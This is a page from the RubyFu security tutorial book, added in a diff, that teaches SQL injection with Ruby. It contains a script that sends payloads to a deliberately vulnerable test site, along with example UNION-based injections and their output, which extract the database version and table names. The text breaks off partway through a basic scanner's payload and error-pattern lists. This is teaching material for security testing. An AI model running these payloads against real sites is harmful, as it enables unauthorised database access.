rubyfu 1.0.1

data/_book/module_0x4__web_kung_fu/sql_injection_scanner.html

@@ -0,0 +1,1489 @@
+<!DOCTYPE HTML>
+<html lang="en" >
+    
+    <head>
+        
+        <meta charset="UTF-8">
+        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
+        <title>SQL Injection Scanner | RubyFu</title>
+        <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
+        <meta name="description" content="">
+        <meta name="generator" content="GitBook 2.6.2">
+        
+        
+        <meta name="HandheldFriendly" content="true"/>
+        <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
+        <meta name="apple-mobile-web-app-capable" content="yes">
+        <meta name="apple-mobile-web-app-status-bar-style" content="black">
+        <link rel="apple-touch-icon-precomposed" sizes="152x152" href="../gitbook/images/apple-touch-icon-precomposed-152.png">
+        <link rel="shortcut icon" href="../gitbook/images/favicon.ico" type="image/x-icon">
+        
+    <link rel="stylesheet" href="../gitbook/style.css">
+    
+        
+        <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-anchors/plugin.css">
+        
+    
+        
+        <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-splitter/splitter.css">
+        
+    
+        
+        <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.css">
+        
+    
+        
+        <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-highlight/website.css">
+        
+    
+        
+        <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-search/search.css">
+        
+    
+        
+        <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-fontsettings/website.css">
+        
+    
+    
+        <link rel="stylesheet" href="../styles/website.css">
+    
+
+        
+    
+    
+    <link rel="next" href="../module_0x4__web_kung_fu/databases.html" />
+    
+    
+    <link rel="prev" href="../module_0x4__web_kung_fu/index.html" />
+    
+
+        <script type="text/javascript" src="../styles/header.js"></script>
+    </head>
+    <body>
+        
+        
+    <div class="book"
+        data-level="4.1"
+        data-chapter-title="SQL Injection Scanner"
+        data-filepath="module_0x4__web_kung_fu/sql_injection_scanner.md"
+        data-basepath=".."
+        data-revision="Wed Jan 27 2016 09:00:51 GMT+0300 (AST)"
+        data-innerlanguage="">
+    
+
+<div class="book-summary">
+    <nav role="navigation">
+        <ul class="summary">
+            
+            
+            
+            
+
+            
+
+            
+    
+        <li class="chapter " data-level="0" data-path="index.html">
+            
+                
+                    <a href="../index.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                        Module 0x0 | Introduction
+                    </a>
+            
+            
+            <ul class="articles">
+                
+    
+        <li class="chapter " data-level="0.1" data-path="contribution.html">
+            
+                
+                    <a href="../contribution.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>0.1.</b>
+                        
+                        Contribution
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="0.2" data-path="beginners.html">
+            
+                
+                    <a href="../beginners.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>0.2.</b>
+                        
+                        Beginners
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="0.3" data-path="required_gems.html">
+            
+                
+                    <a href="../required_gems.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>0.3.</b>
+                        
+                        Required Gems
+                    </a>
+            
+            
+        </li>
+    
+
+            </ul>
+            
+        </li>
+    
+        <li class="chapter " data-level="1" data-path="module_0x1__basic_ruby_kung_fu/index.html">
+            
+                
+                    <a href="../module_0x1__basic_ruby_kung_fu/index.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>1.</b>
+                        
+                        Module 0x1 | Basic Ruby Kung Fu
+                    </a>
+            
+            
+            <ul class="articles">
+                
+    
+        <li class="chapter " data-level="1.1" data-path="module_0x1__basic_ruby_kung_fu/string.html">
+            
+                
+                    <a href="../module_0x1__basic_ruby_kung_fu/string.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>1.1.</b>
+                        
+                        String
+                    </a>
+            
+            
+            <ul class="articles">
+                
+    
+        <li class="chapter " data-level="1.1.1" data-path="module_0x1__basic_ruby_kung_fu/conversion.html">
+            
+                
+                    <a href="../module_0x1__basic_ruby_kung_fu/conversion.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>1.1.1.</b>
+                        
+                        Conversion
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="1.1.2" data-path="module_0x1__basic_ruby_kung_fu/extraction.html">
+            
+                
+                    <a href="../module_0x1__basic_ruby_kung_fu/extraction.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>1.1.2.</b>
+                        
+                        Extraction
+                    </a>
+            
+            
+        </li>
+    
+
+            </ul>
+            
+        </li>
+    
+        <li class="chapter " data-level="1.2" data-path="module_0x1__basic_ruby_kung_fu/array.html">
+            
+                
+                    <a href="../module_0x1__basic_ruby_kung_fu/array.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>1.2.</b>
+                        
+                        Array
+                    </a>
+            
+            
+        </li>
+    
+
+            </ul>
+            
+        </li>
+    
+        <li class="chapter " data-level="2" data-path="module_0x2__system_kung_fu/index.html">
+            
+                
+                    <a href="../module_0x2__system_kung_fu/index.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>2.</b>
+                        
+                        Module 0x2 | System Kung Fu
+                    </a>
+            
+            
+            <ul class="articles">
+                
+    
+        <li class="chapter " data-level="2.1" data-path="module_0x2__system_kung_fu/command_execution.html">
+            
+                
+                    <a href="../module_0x2__system_kung_fu/command_execution.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>2.1.</b>
+                        
+                        Command Execution
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="2.2" data-path="module_0x2__system_kung_fu/file_manipulation.html">
+            
+                
+                    <a href="../module_0x2__system_kung_fu/file_manipulation.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>2.2.</b>
+                        
+                        File manipulation
+                    </a>
+            
+            
+            <ul class="articles">
+                
+    
+        <li class="chapter " data-level="2.2.1" data-path="module_0x2__system_kung_fu/parsing_html,_xml,_json.html">
+            
+                
+                    <a href="../module_0x2__system_kung_fu/parsing_html,_xml,_json.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>2.2.1.</b>
+                        
+                        Parsing HTML, XML, JSON
+                    </a>
+            
+            
+        </li>
+    
+
+            </ul>
+            
+        </li>
+    
+        <li class="chapter " data-level="2.3" data-path="module_0x2__system_kung_fu/cryptography.html">
+            
+                
+                    <a href="../module_0x2__system_kung_fu/cryptography.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>2.3.</b>
+                        
+                        Cryptography
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="2.4" data-path="module_0x2__system_kung_fu/system_shell.html">
+            
+                
+                    <a href="../module_0x2__system_kung_fu/system_shell.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>2.4.</b>
+                        
+                        Remote Shell
+                    </a>
+            
+            
+            <ul class="articles">
+                
+    
+        <li class="chapter " data-level="2.4.1" data-path="module_0x2__system_kung_fu/ncatrb.html">
+            
+                
+                    <a href="../module_0x2__system_kung_fu/ncatrb.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>2.4.1.</b>
+                        
+                        Ncat.rb
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="2.4.2" data-path="module_0x2__system_kung_fu/rce_as_a_service.html">
+            
+                
+                    <a href="../module_0x2__system_kung_fu/rce_as_a_service.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>2.4.2.</b>
+                        
+                        RCE as a Service
+                    </a>
+            
+            
+        </li>
+    
+
+            </ul>
+            
+        </li>
+    
+        <li class="chapter " data-level="2.5" data-path="module_0x2__system_kung_fu/virustotal.html">
+            
+                
+                    <a href="../module_0x2__system_kung_fu/virustotal.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>2.5.</b>
+                        
+                        VirusTotal
+                    </a>
+            
+            
+        </li>
+    
+
+            </ul>
+            
+        </li>
+    
+        <li class="chapter " data-level="3" data-path="module_0x3__network_kung_fu/index.html">
+            
+                
+                    <a href="../module_0x3__network_kung_fu/index.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>3.</b>
+                        
+                        Module 0x3 | Network Kung Fu
+                    </a>
+            
+            
+            <ul class="articles">
+                
+    
+        <li class="chapter " data-level="3.1" data-path="module_0x3__network_kung_fu/ruby_socket.html">
+            
+                
+                    <a href="../module_0x3__network_kung_fu/ruby_socket.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>3.1.</b>
+                        
+                        Ruby Socket
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="3.2" data-path="module_0x3__network_kung_fu/ssid_finder.html">
+            
+                
+                    <a href="../module_0x3__network_kung_fu/ssid_finder.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>3.2.</b>
+                        
+                        SSID Finder
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="3.3" data-path="module_0x3__network_kung_fu/ftp.html">
+            
+                
+                    <a href="../module_0x3__network_kung_fu/ftp.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>3.3.</b>
+                        
+                        FTP
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="3.4" data-path="module_0x3__network_kung_fu/ssh.html">
+            
+                
+                    <a href="../module_0x3__network_kung_fu/ssh.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>3.4.</b>
+                        
+                        SSH
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="3.5" data-path="module_0x2__system_kung_fu/email.html">
+            
+                
+                    <a href="../module_0x2__system_kung_fu/email.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>3.5.</b>
+                        
+                        Email
+                    </a>
+            
+            
+            <ul class="articles">
+                
+    
+        <li class="chapter " data-level="3.5.1" data-path="module_0x2__system_kung_fu/smtp_enumeration.html">
+            
+                
+                    <a href="../module_0x2__system_kung_fu/smtp_enumeration.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>3.5.1.</b>
+                        
+                        SMTP Enumeration
+                    </a>
+            
+            
+        </li>
+    
+
+            </ul>
+            
+        </li>
+    
+        <li class="chapter " data-level="3.6" data-path="module_0x3__network_kung_fu/network_scanning.html">
+            
+                
+                    <a href="../module_0x3__network_kung_fu/network_scanning.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>3.6.</b>
+                        
+                        Network Scanning
+                    </a>
+            
+            
+            <ul class="articles">
+                
+    
+        <li class="chapter " data-level="3.6.1" data-path="module_0x3__network_kung_fu/nmap.html">
+            
+                
+                    <a href="../module_0x3__network_kung_fu/nmap.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>3.6.1.</b>
+                        
+                        Nmap
+                    </a>
+            
+            
+        </li>
+    
+
+            </ul>
+            
+        </li>
+    
+        <li class="chapter " data-level="3.7" data-path="module_0x3__network_kung_fu/dns.html">
+            
+                
+                    <a href="../module_0x3__network_kung_fu/dns.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>3.7.</b>
+                        
+                        DNS
+                    </a>
+            
+            
+            <ul class="articles">
+                
+    
+        <li class="chapter " data-level="3.7.1" data-path="module_0x3__network_kung_fu/dns_enumeration.html">
+            
+                
+                    <a href="../module_0x3__network_kung_fu/dns_enumeration.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>3.7.1.</b>
+                        
+                        DNS Enumeration
+                    </a>
+            
+            
+        </li>
+    
+
+            </ul>
+            
+        </li>
+    
+        <li class="chapter " data-level="3.8" data-path="module_0x3__network_kung_fu/snmp_enumeration.html">
+            
+                
+                    <a href="../module_0x3__network_kung_fu/snmp_enumeration.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>3.8.</b>
+                        
+                        SNMP Enumeration
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="3.9" data-path="module_0x3__network_kung_fu/tns_enumeration.html">
+            
+                
+                    <a href="../module_0x3__network_kung_fu/tns_enumeration.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>3.9.</b>
+                        
+                        Oracle TNS Enumeration
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="3.10" data-path="module_0x3__network_kung_fu/packet_manipulation.html">
+            
+                
+                    <a href="../module_0x3__network_kung_fu/packet_manipulation.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>3.10.</b>
+                        
+                        Packet manipulation
+                    </a>
+            
+            
+            <ul class="articles">
+                
+    
+        <li class="chapter " data-level="3.10.1" data-path="module_0x3__network_kung_fu/arp_spoofing.html">
+            
+                
+                    <a href="../module_0x3__network_kung_fu/arp_spoofing.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>3.10.1.</b>
+                        
+                        ARP Spoofing
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="3.10.2" data-path="module_0x3__network_kung_fu/dns_spoofing.html">
+            
+                
+                    <a href="../module_0x3__network_kung_fu/dns_spoofing.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>3.10.2.</b>
+                        
+                        DNS Spoofing
+                    </a>
+            
+            
+        </li>
+    
+
+            </ul>
+            
+        </li>
+    
+
+            </ul>
+            
+        </li>
+    
+        <li class="chapter " data-level="4" data-path="module_0x4__web_kung_fu/index.html">
+            
+                
+                    <a href="../module_0x4__web_kung_fu/index.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>4.</b>
+                        
+                        Module 0x4 | Web Kung Fu
+                    </a>
+            
+            
+            <ul class="articles">
+                
+    
+        <li class="chapter active" data-level="4.1" data-path="module_0x4__web_kung_fu/sql_injection_scanner.html">
+            
+                
+                    <a href="../module_0x4__web_kung_fu/sql_injection_scanner.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>4.1.</b>
+                        
+                        SQL Injection Scanner
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="4.2" data-path="module_0x4__web_kung_fu/databases.html">
+            
+                
+                    <a href="../module_0x4__web_kung_fu/databases.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>4.2.</b>
+                        
+                        Databases
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="4.3" data-path="module_0x4__web_kung_fu/extending_burpsuite.html">
+            
+                
+                    <a href="../module_0x4__web_kung_fu/extending_burpsuite.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>4.3.</b>
+                        
+                        Extending Burp Suite
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="4.4" data-path="module_0x4__web_kung_fu/browser_manipulation.html">
+            
+                
+                    <a href="../module_0x4__web_kung_fu/browser_manipulation.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>4.4.</b>
+                        
+                        Browser Manipulation
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="4.5" data-path="module_0x4__web_kung_fu/web_servcies_and_apis.html">
+            
+                
+                    <a href="../module_0x4__web_kung_fu/web_servcies_and_apis.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>4.5.</b>
+                        
+                        Web Services and APIs
+                    </a>
+            
+            
+            <ul class="articles">
+                
+    
+        <li class="chapter " data-level="4.5.1" data-path="module_0x4__web_kung_fu/web_services.html">
+            
+                
+                    <a href="../module_0x4__web_kung_fu/web_services.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>4.5.1.</b>
+                        
+                        Interacting with Web Services
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="4.5.2" data-path="module_0x4__web_kung_fu/interacting_with_apis.html">
+            
+                
+                    <a href="../module_0x4__web_kung_fu/interacting_with_apis.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>4.5.2.</b>
+                        
+                        Interacting with APIs
+                    </a>
+            
+            
+            <ul class="articles">
+                
+    
+        <li class="chapter " data-level="4.5.2.1" data-path="module_0x4__web_kung_fu/wordpress_api.html">
+            
+                
+                    <a href="../module_0x4__web_kung_fu/wordpress_api.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>4.5.2.1.</b>
+                        
+                        WordPress API
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="4.5.2.2" data-path="module_0x4__web_kung_fu/twitter_api.html">
+            
+                
+                    <a href="../module_0x4__web_kung_fu/twitter_api.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>4.5.2.2.</b>
+                        
+                        Twitter API
+                    </a>
+            
+            
+        </li>
+    
+
+            </ul>
+            
+        </li>
+    
+
+            </ul>
+            
+        </li>
+    
+        <li class="chapter " data-level="4.6" data-path="module_0x4__web_kung_fu/ruby2javascript.html">
+            
+                
+                    <a href="../module_0x4__web_kung_fu/ruby2javascript.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>4.6.</b>
+                        
+                        Ruby 2 JavaScript
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="4.7" data-path="module_0x4__web_kung_fu/web_server_and_proxy.html">
+            
+                
+                    <a href="../module_0x4__web_kung_fu/web_server_and_proxy.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>4.7.</b>
+                        
+                        Web Server and Proxy
+                    </a>
+            
+            
+        </li>
+    
+
+            </ul>
+            
+        </li>
+    
+        <li class="chapter " data-level="5" data-path="module_0x5__exploitation_kung_fu/index.html">
+            
+                
+                    <a href="../module_0x5__exploitation_kung_fu/index.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>5.</b>
+                        
+                        Module 0x5 | Exploitation Kung Fu
+                    </a>
+            
+            
+            <ul class="articles">
+                
+    
+        <li class="chapter " data-level="5.1" data-path="module_0x5__exploitation_kung_fu/fuzzer.html">
+            
+                
+                    <a href="../module_0x5__exploitation_kung_fu/fuzzer.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>5.1.</b>
+                        
+                        Fuzzer
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="5.2" data-path="module_0x5__exploitation_kung_fu/metasploit.html">
+            
+                
+                    <a href="../module_0x5__exploitation_kung_fu/metasploit.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>5.2.</b>
+                        
+                        Metasploit
+                    </a>
+            
+            
+            <ul class="articles">
+                
+    
+        <li class="chapter " data-level="5.2.1" data-path="module_0x5__exploitation_kung_fu/auxiliary_module.html">
+            
+                
+                    <a href="../module_0x5__exploitation_kung_fu/auxiliary_module.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>5.2.1.</b>
+                        
+                        Auxiliary module
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="5.2.2" data-path="module_0x5__exploitation_kung_fu/exploit_module.html">
+            
+                
+                    <a href="../module_0x5__exploitation_kung_fu/exploit_module.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>5.2.2.</b>
+                        
+                        Exploit module
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="5.2.3" data-path="module_0x5__exploitation_kung_fu/meterpreter.html">
+            
+                
+                    <a href="../module_0x5__exploitation_kung_fu/meterpreter.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>5.2.3.</b>
+                        
+                        Meterpreter
+                    </a>
+            
+            
+            <ul class="articles">
+                
+    
+        <li class="chapter " data-level="5.2.3.1" data-path="module_0x5__exploitation_kung_fu/extensions.html">
+            
+                
+                    <a href="../module_0x5__exploitation_kung_fu/extensions.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>5.2.3.1.</b>
+                        
+                        API and Extensions
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="5.2.3.2" data-path="module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
+            
+                
+                    <a href="../module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>5.2.3.2.</b>
+                        
+                        Meterpreter Scripting
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="5.2.3.3" data-path="module_0x5__exploitation_kung_fu/railgun_api_extension.html">
+            
+                
+                    <a href="../module_0x5__exploitation_kung_fu/railgun_api_extension.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>5.2.3.3.</b>
+                        
+                        Railgun API Extension
+                    </a>
+            
+            
+        </li>
+    
+
+            </ul>
+            
+        </li>
+    
+
+            </ul>
+            
+        </li>
+    
+        <li class="chapter " data-level="5.3" data-path="module_0x5__exploitation_kung_fu/metasm.html">
+            
+                
+                    <a href="../module_0x5__exploitation_kung_fu/metasm.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>5.3.</b>
+                        
+                        metasm
+                    </a>
+            
+            
+        </li>
+    
+
+            </ul>
+            
+        </li>
+    
+        <li class="chapter " data-level="6" data-path="module_0x6__forensic/index.html">
+            
+                
+                    <a href="../module_0x6__forensic/index.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>6.</b>
+                        
+                        Module 0x6 | Forensic Kung Fu
+                    </a>
+            
+            
+            <ul class="articles">
+                
+    
+        <li class="chapter " data-level="6.1" data-path="module_0x6__forensic/windows_forensic.html">
+            
+                
+                    <a href="../module_0x6__forensic/windows_forensic.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>6.1.</b>
+                        
+                        Windows Forensic
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="6.2" data-path="module_0x6__forensic/android_forensic.html">
+            
+                
+                    <a href="../module_0x6__forensic/android_forensic.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>6.2.</b>
+                        
+                        Android Forensic
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="6.3" data-path="module_0x3__network_kung_fu/network_traffic_analysis.html">
+            
+                
+                    <a href="../module_0x3__network_kung_fu/network_traffic_analysis.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>6.3.</b>
+                        
+                        Network Traffic Analysis
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="6.4" data-path="module_0x6__forensic/parsing_log_files.html">
+            
+                
+                    <a href="../module_0x6__forensic/parsing_log_files.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>6.4.</b>
+                        
+                        Parsing Log Files
+                    </a>
+            
+            
+        </li>
+    
+
+            </ul>
+            
+        </li>
+    
+        <li class="chapter " data-level="7" data-path="references/index.html">
+            
+                
+                    <a href="../references/index.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>7.</b>
+                        
+                        References
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="8" data-path="faqs/index.html">
+            
+                
+                    <a href="../faqs/index.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>8.</b>
+                        
+                        FAQs
+                    </a>
+            
+            
+        </li>
+    
+        <li class="chapter " data-level="9" data-path="contributors/index.html">
+            
+                
+                    <a href="../contributors/index.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>9.</b>
+                        
+                        Contributors
+                    </a>
+            
+            
+            <ul class="articles">
+                
+    
+        <li class="chapter " data-level="9.1" data-path="contributors/todo.html">
+            
+                
+                    <a href="../contributors/todo.html">
+                
+                        <i class="fa fa-check"></i>
+                        
+                            <b>9.1.</b>
+                        
+                        TODO
+                    </a>
+            
+            
+        </li>
+    
+
+            </ul>
+            
+        </li>
+    
+
+
+            
+            <li class="divider"></li>
+            <li>
+                <a href="https://www.gitbook.com" target="blank" class="gitbook-link">
+                    Published with GitBook
+                </a>
+            </li>
+            
+        </ul>
+    </nav>
+</div>
+
+    <div class="book-body">
+        <div class="body-inner">
+            <div class="book-header" role="navigation">
+    <!-- Actions Left -->
+    
+
+    <!-- Title -->
+    <h1>
+        <i class="fa fa-circle-o-notch fa-spin"></i>
+        <a href="../" >RubyFu</a>
+    </h1>
+</div>
+
+            <div class="page-wrapper" tabindex="-1" role="main">
+                <div class="page-inner">
+                
+                
+                    <section class="normal" id="section-">
+                    
+                        <h1 id="sql-injection-scanner"><a name="sql-injection-scanner" class="plugin-anchor" href="#sql-injection-scanner"><span class="fa fa-link"></span></a>SQL Injection Scanner</h1>
+<h2 id="basic-sqli-script-as-command-line-browser"><a name="basic-sqli-script-as-command-line-browser" class="plugin-anchor" href="#basic-sqli-script-as-command-line-browser"><span class="fa fa-link"></span></a>Basic SQLi script as command line browser</h2>
+<p>The is a very basic script take your given payload and send it to the vulnerable parameter and returns the response back to you. I&apos;ll use (<a href="http://testphp.vulnweb.com/" target="_blank">http://testphp.vulnweb.com/</a>) as it&apos;s legal to test.</p>
+<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
+<span class="hljs-comment"># KING SABRI | <span class="hljs-doctag">@KINGSABRI</span></span>
+<span class="hljs-comment"># Send your payload from command line</span>
+<span class="hljs-comment">#</span>
+<span class="hljs-keyword">require</span> <span class="hljs-string">&quot;net/http&quot;</span>
+
+<span class="hljs-keyword">if</span> <span class="hljs-constant">ARGV</span>.size &lt; <span class="hljs-number">2</span>
+  puts <span class="hljs-string">&quot;[+] ruby <span class="hljs-subst">#{__FILE_<span class="hljs-number">_</span>}</span> [IP ADDRESS] [PAYLOAD]&quot;</span>
+  exit <span class="hljs-number">0</span>
+<span class="hljs-keyword">else</span>
+  host, payload = <span class="hljs-constant">ARGV</span>
+<span class="hljs-keyword">end</span>
+
+uri = <span class="hljs-constant">URI</span>.parse(<span class="hljs-string">&quot;http://<span class="hljs-subst">#{host}</span>/artists.php?&quot;</span>)
+uri.query = <span class="hljs-constant">URI</span>.encode_www_form({<span class="hljs-string">&quot;artist&quot;</span> =&gt; <span class="hljs-string">&quot;<span class="hljs-subst">#{payload}</span>&quot;</span>})
+http = <span class="hljs-constant">Net::HTTP</span>.new(uri.host, uri.port)
+http.use_ssl = <span class="hljs-keyword">true</span> <span class="hljs-keyword">if</span> uri.scheme == <span class="hljs-string">&apos;https&apos;</span>    <span class="hljs-comment"># Enable HTTPS support if it&apos;s HTTPS</span>
+<span class="hljs-comment"># http.set_debug_output($stdout)</span>
+
+request = <span class="hljs-constant">Net::HTTP::Get</span>.new(uri.request_uri)
+response = http.request(request)
+<span class="hljs-comment"># puts &quot;[+] Status code: &quot;+ response.code + &quot;\n\n&quot;</span>
+<span class="hljs-comment"># puts response.body.gsub(/&lt;.*?&gt;/, &apos;&apos;).strip</span>
+puts response.body.scan(<span class="hljs-regexp">/&lt;h2 id=&apos;pageName&apos;&gt;.*&lt;\/h2&gt;/</span>).join.gsub(<span class="hljs-regexp">/&lt;.*?&gt;/</span>, <span class="hljs-string">&apos;&apos;</span>).strip
+
+puts <span class="hljs-string">&quot;&quot;</span>
+</code></pre>
+<blockquote>
+<p>I&apos;ve commented the line <code>puts response.body.gsub(/&lt;.*?&gt;/, &apos;&apos;).strip</code> and added a custom regular expression to fix our target outputs.</p>
+</blockquote>
+<p>Let&apos;s to test it in action</p>
+<pre><code>ruby sqli-basic.rb &quot;testphp.vulnweb.com&quot; &quot;-1 UNION ALL SELECT NULL,NULL,NULL,NULL#&quot; | grep -i -e warning -e error
+# =&gt; Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/artists.php on line 62
+
+ruby sqli-basic.rb &quot;testphp.vulnweb.com&quot; &quot;-1 UNION ALL SELECT NULL,NULL,NULL#&quot; | grep -i -e warning -e error
+# =&gt; 
+
+ruby sqli-basic.rb &quot;testphp.vulnweb.com&quot; &quot;-1 UNION ALL SELECT NULL,@@VERSION,NULL#&quot;
+# =&gt; artist: 5.1.73-0ubuntu0.10.04.1
+
+ruby sqli-basic.rb &quot;testphp.vulnweb.com&quot; &quot;-1 UNION ALL SELECT NULL,GROUP_CONCAT(table_name),NULL FROM information_schema.tables#&quot; 
+# =&gt; artist: CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVIL
+</code></pre><p>Here a very basic and simple SQL-injection solid scanner, develop it as far as you can!</p>
+<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
+<span class="hljs-comment"># KING SABRI | <span class="hljs-doctag">@KINGSABRI</span></span>
+<span class="hljs-comment"># Very basic SQLi scanner!</span>
+<span class="hljs-comment">#</span>
+<span class="hljs-keyword">require</span> <span class="hljs-string">&apos;net/http&apos;</span>
+
+<span class="hljs-comment"># Some SQLi payloads</span>
+payloads =
+    [
+      <span class="hljs-string">&quot;&apos;&quot;</span>,
+      <span class="hljs-string">&apos;&quot;&apos;</span>,
+      <span class="hljs-string">&quot;&apos; or 1=2--+&quot;</span>
+    ]
+
+<span class="hljs-comment"># Some database error responses</span>
+errors =
+    {
+      <span class="hljs-symbol">:mysql</span> =&gt; [
+                 <span class="hljs-string">&quot;SQL.*syntax&quot;</span>,
+                 <span class="hljs-string">&quot;mysql.*(fetch).*array&quot;</span>,
+                 <span class="hljs-string">&quot;Warning&quot;</span>
+                ],
+      <span class="hljs-symbol">:mssql</span> =&gt; [
+                 <span class="hljs-string">&quot;line.*[0-9]&quot;</span>,
